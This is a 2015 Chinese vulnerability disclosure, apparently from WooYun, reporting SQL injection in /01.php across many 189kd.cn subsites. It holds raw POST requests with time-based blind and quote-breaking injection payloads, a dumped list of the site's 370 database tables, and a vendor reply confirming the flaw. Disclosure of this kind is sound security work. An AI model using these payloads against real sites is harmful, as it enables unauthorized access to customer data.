漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2015-06-09:	细节已通知厂商并且等待厂商处理中
									2015-06-12:	厂商已经确认,细节仅向厂商公开
									2015-06-22:	细节向核心白帽子及相关领域专家公开
									2015-07-02:	细节向普通白帽子公开
									2015-07-12:	细节向实习白帽子公开
									2015-07-27:	细节向公众公开
								
简要描述:
多个分站通用注入,疑似被入侵
详细说明:
影响站点(一部分):
http://www.189kd.cn:80/
http://cz.189kd.cn:80/
http://hz.189kd.cn:80/
http://zh.189kd.cn:80/
http://sz.189kd.cn:80/
http://fs.189kd.cn:80/
http://dg.189kd.cn:80/
http://zs.189kd.cn:80/
http://mz.189kd.cn:80/
http://zq.189kd.cn:80/
http://gz.189kd.cn:80/
主站:
POST /01.php HTTP/1.1
Content-Length: 315
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.189kd.cn:80/
Host: www.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=62&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
分站:
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq
POST /01.php HTTP/1.1
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
Referer: http://dg.189kd.cn/
Host: dg.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=19&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=
还有好多。。。不一一列举了
贴上主站得表。。
Database: kuandai_189kd
[370 tables]
+-----------------------+
| v9_admin              |
| v9_admin_panel        |
| v9_admin_role         |
| v9_admin_role_priv    |
| v9_announce           |
| v9_attachment         |
| v9_attachment_index   |
| v9_badword            |
| v9_bank               |
| v9_block              |
| v9_block_history      |
| v9_block_priv         |
| v9_cache              |
| v9_category           |
| v9_category_copy      |
| v9_category_priv      |
| v9_chanpin            |
| v9_chanpin_data       |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node    |
| v9_collection_program |
| v9_comment            |
| v9_comment_check      |
| v9_comment_data_1     |
| v9_comment_setting    |
| v9_comment_table      |
| v9_content_check      |
| v9_copyfrom           |
| v9_cz_news            |
| v9_cz_news_data       |
| v9_cz_picture         |
| v9_cz_picture_data    |
| v9_cz_product         |
| v9_cz_product_data    |
| v9_datacall           |
| v9_dbsource           |
| v9_dg_news            |
| v9_dg_news_data       |
| v9_dg_picture         |
| v9_dg_picture_data    |
| v9_dg_product         |
| v9_dg_product_data    |
| v9_download           |
| v9_download_data      |
| v9_downservers        |
| v9_dxpd               |
| v9_dxpd_data          |
| v9_extend_setting     |
| v9_favorite           |
| v9_fs_news            |
| v9_fs_news_data       |
| v9_fs_picture         |
| v9_fs_picture_data    |
| v9_fs_product         |
| v9_fs_product_data    |
| v9_gz_news            |
| v9_gz_news_data       |
| v9_gz_picture         |
| v9_gz_picture_data    |
| v9_gz_product         |
| v9_gz_product_data    |
| v9_hits               |
| v9_hn_news            |
| v9_hn_news_data       |
| v9_hn_product         |
| v9_hn_product_data    |
| v9_hncd_news          |
| v9_hncd_news_data     |
| v9_hncd_product       |
| v9_hncd_product_data  |
| v9_hncs_news          |
| v9_hncs_news_data     |
| v9_hncs_product       |
| v9_hncs_product_data  |
| v9_hncz_news          |
| v9_hncz_news_data     |
| v9_hncz_product       |
| v9_hncz_product_data  |
| v9_hnhh_news          |
| v9_hnhh_news_data     |
| v9_hnhh_product       |
| v9_hnhh_product_data  |
| v9_hnhy_news          |
| v9_hnhy_news_data     |
| v9_hnhy_product       |
| v9_hnhy_product_data  |
| v9_hnld_news          |
| v9_hnld_news_data     |
| v9_hnld_product       |
| v9_hnld_product_data  |
| v9_hnsy_news          |
| v9_hnsy_news_data     |
| v9_hnsy_product       |
| v9_hnsy_product_data  |
| v9_hnxt_news          |
| v9_hnxt_news_data     |
| v9_hnxt_product       |
| v9_hnxt_product_data  |
| v9_hnyiy_news         |
| v9_hnyiy_news_data    |
| v9_hnyiy_product      |
| v9_hnyiy_product_data |
| v9_hnyy_news          |
| v9_hnyy_news_data     |
| v9_hnyy_product       |
| v9_hnyy_product_data  |
| v9_hnyz_news          |
| v9_hnyz_news_data     |
| v9_hnyz_product       |
| v9_hnyz_product_data  |
| v9_hnzjj_news         |
| v9_hnzjj_news_data    |
| v9_hnzjj_product      |
| v9_hnzjj_product_data |
| v9_hnzz_news          |
| v9_hnzz_news_data     |
| v9_hnzz_product       |
| v9_hnzz_product_data  |
| v9_hnzzz_news         |
| v9_hnzzz_news_data    |
| v9_hnzzz_product      |
| v9_hnzzz_product_data |
| v9_hy_news            |
| v9_hy_news_data       |
| v9_hy_picture         |
| v9_hy_picture_data    |
| v9_hy_product         |
| v9_hy_product_data    |
| v9_hz_news            |
| v9_hz_news_data       |
| v9_hz_picture         |
| v9_hz_picture_data    |
| v9_hz_product         |
| v9_hz_product_data    |
| v9_ipbanned           |
| v9_jm_news            |
| v9_jm_news_data       |
| v9_jm_picture         |
| v9_jm_picture_data    |
| v9_jm_product         |
| v9_jm_product_data    |
| v9_js_news            |
| v9_js_news_data       |
| v9_js_picture         |
| v9_js_picture_data    |
| v9_js_product         |
| v9_js_product_data    |
| v9_jscz_news          |
| v9_jscz_news_data     |
| v9_jscz_picture       |
| v9_jscz_picture_data  |
| v9_jsdx_news          |
| v9_jsdx_news_data     |
| v9_jsdx_picture       |
| v9_jsdx_picture_data  |
| v9_jsha_news          |
| v9_jsha_news_data     |
| v9_jsha_product       |
| v9_jsha_product_data  |
| v9_jslyg_news         |
| v9_jslyg_news_data    |
| v9_jslyg_product      |
| v9_jslyg_product_data |
| v9_jsnt_news          |
| v9_jsnt_news_data     |
| v9_jsnt_product       |
| v9_jsnt_product_data  |
| v9_jssq_news          |
| v9_jssq_news_data     |
| v9_jssq_product       |
| v9_jssq_product_data  |
| v9_jssz_news          |
| v9_jssz_news_data     |
| v9_jssz_product       |
| v9_jssz_product_data  |
| v9_jstz_news          |
| v9_jstz_news_data     |
| v9_jstz_product       |
| v9_jstz_product_data  |
| v9_jswx_news          |
| v9_jswx_news_data     |
| v9_jswx_picture       |
| v9_jswx_picture_data  |
| v9_jsxz_news          |
| v9_jsxz_news_data     |
| v9_jsxz_picture       |
| v9_jsxz_picture_data  |
| v9_jsyc_news          |
| v9_jsyc_news_data     |
| v9_jsyc_product       |
| v9_jsyc_product_data  |
| v9_jsyz_news          |
| v9_jsyz_news_data     |
| v9_jsyz_product       |
| v9_jsyz_product_data  |
| v9_jszj_news          |
| v9_jszj_news_data     |
| v9_jszj_product       |
| v9_jszj_product_data  |
| v9_jy_news            |
| v9_jy_news_data       |
| v9_jy_picture         |
| v9_jy_picture_data    |
| v9_jy_product         |
| v9_jy_product_data    |
| v9_keylink            |
| v9_keyword            |
| v9_keyword_data       |
| v9_link               |
| v9_linkage            |
| v9_log                |
| v9_member             |
| v9_member_detail      |
| v9_member_group       |
| v9_member_menu        |
| v9_member_verify      |
| v9_member_vip         |
| v9_menu               |
| v9_message            |
| v9_message_data       |
| v9_message_group      |
| v9_mm_news            |
| v9_mm_news_data       |
| v9_mm_picture         |
| v9_mm_picture_data    |
| v9_mm_product         |
| v9_mm_product_data    |
| v9_model              |
| v9_model_field        |
| v9_module             |
| v9_mood               |
| v9_mz_news            |
| v9_mz_news_data       |
| v9_mz_picture         |
| v9_mz_picture_data    |
| v9_mz_product         |
| v9_mz_product_data    |
| v9_news               |
| v9_news_data          |
| v9_nj_news            |
| v9_nj_news_data       |
| v9_nj_picture         |
| v9_nj_picture_data    |
| v9_nj_product         |
| v9_nj_product_data    |
| v9_page               |
| v9_pay_account        |
| v9_pay_payment        |
| v9_pay_spend          |
| v9_picture            |
| v9_picture_data       |
| v9_position           |
| v9_position_data      |
| v9_poster             |
| v9_poster_201409      |
| v9_poster_201410      |
| v9_poster_201411      |
| v9_poster_201504      |
| v9_poster_space       |
| v9_queue              |
| v9_release_point      |
| v9_search             |
| v9_search_keyword     |
| v9_session            |
| v9_sg_news            |
| v9_sg_news_data       |
| v9_sg_picture         |
| v9_sg_picture_data    |
| v9_sg_product         |
| v9_sg_product_data    |
| v9_sh_news            |
| v9_sh_news_data       |
| v9_sh_picture         |
| v9_sh_picture_data    |
| v9_sh_product         |
| v9_sh_product_data    |
| v9_shouji             |
| v9_shouji_data        |
| v9_site               |
| v9_sms_report         |
| v9_special            |
| v9_special_c_data     |
| v9_special_content    |
| v9_sphinx_counter     |
| v9_sso_admin          |
| v9_sso_applications   |
| v9_sso_members        |
| v9_sso_messagequeue   |
| v9_sso_session        |
| v9_sso_settings       |
| v9_st_news            |
| v9_st_news_data       |
| v9_st_picture         |
| v9_st_picture_data    |
| v9_st_product         |
| v9_st_product_data    |
| v9_sw_news            |
| v9_sw_news_data       |
| v9_sw_picture         |
| v9_sw_picture_data    |
| v9_sw_product         |
| v9_sw_product_data    |
| v9_sz_news            |
| v9_sz_news_data       |
| v9_sz_picture         |
| v9_sz_picture_data    |
| v9_sz_product         |
| v9_sz_product_data    |
| v9_sz_shouji          |
| v9_sz_shouji_data     |
| v9_tag                |
| v9_template_bak       |
| v9_times              |
| v9_type               |
| v9_urlrule            |
| v9_video              |
| v9_video_content      |
| v9_video_data         |
| v9_video_store        |
| v9_vote_data          |
| v9_vote_option        |
| v9_vote_subject       |
| v9_wap                |
| v9_wap_type           |
| v9_workflow           |
| v9_yf_news            |
| v9_yf_news_data       |
| v9_yf_picture         |
| v9_yf_picture_data    |
| v9_yf_product         |
| v9_yf_product_data    |
| v9_yj2_news           |
| v9_yj2_news_data      |
| v9_yj2_picture        |
| v9_yj2_picture_data   |
| v9_yj2_product        |
| v9_yj2_product_data   |
| v9_yj_news            |
| v9_yj_news_data       |
| v9_yj_picture         |
| v9_yj_picture_data    |
| v9_yj_product         |
| v9_yj_product_data    |
| v9_zh_news            |
| v9_zh_news_data       |
| v9_zh_picture         |
| v9_zh_picture_data    |
| v9_zh_product         |
| v9_zh_product_data    |
| v9_zj_news            |
| v9_zj_news_data       |
| v9_zj_picture         |
| v9_zj_picture_data    |
| v9_zj_product         |
| v9_zj_product_data    |
| v9_zq_news            |
| v9_zq_news_data       |
| v9_zq_picture         |
| v9_zq_picture_data    |
| v9_zq_product         |
| v9_zq_product_data    |
| v9_zs_news            |
| v9_zs_news_data       |
| v9_zs_picture         |
| v9_zs_picture_data    |
| v9_zs_product         |
| v9_zs_product_data    |
| v9_zxd                |
| v9_zxxd               |
+-----------------------+
往下不继续了。。。 
漏洞证明:
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://mz.189kd.cn/
Host: mz.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zq.189kd.cn/
Host: zq.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=nbnetqxq
POST /01.php HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Referer: http://zs.189kd.cn/
Host: zs.189kd.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=3137%20Laguna%20Street&bank=0&bank_number=1&card_number=1&cid=1'%22&img1=&img2=&img3=&phone=555-666-0606&pid_img1=&pid_img2=&pid_img3=&tijiao=%cc%e1%bd%bb%c9%ea%c7%eb&username=urquxvdx
修复方案:
版权声明:转载请注明来源 新生@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2015-06-12 19:13
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
最新状态:
暂无

 
                 
                        



